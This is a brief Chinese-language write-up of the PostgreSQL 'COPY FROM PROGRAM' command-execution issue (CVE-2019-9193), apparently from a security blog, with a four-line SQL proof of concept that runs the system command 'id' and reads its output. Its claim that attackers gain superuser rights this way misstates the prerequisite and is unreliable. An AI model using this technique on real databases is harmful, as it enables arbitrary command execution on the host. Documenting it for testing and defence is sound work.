# (CVE-2019-9193)PostgreSQL 高权限命令执行漏洞
======
一、漏洞简介
————
PostgreSQL
9.3至11.2版本中的导入导出数据命令`COPY TO/FROM PROGRAM`存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令。
二、漏洞影响
————
PostgreSQL 9.3至11.2
三、复现过程
————
首先连接到postgres中,并执行如下POC:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM ‘id’;
SELECT * FROM cmd_exec;
PostgreSQL_高权限命令执行漏洞/img/rId24.png)
PostgreSQL_高权限命令执行漏洞/img/rId25.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容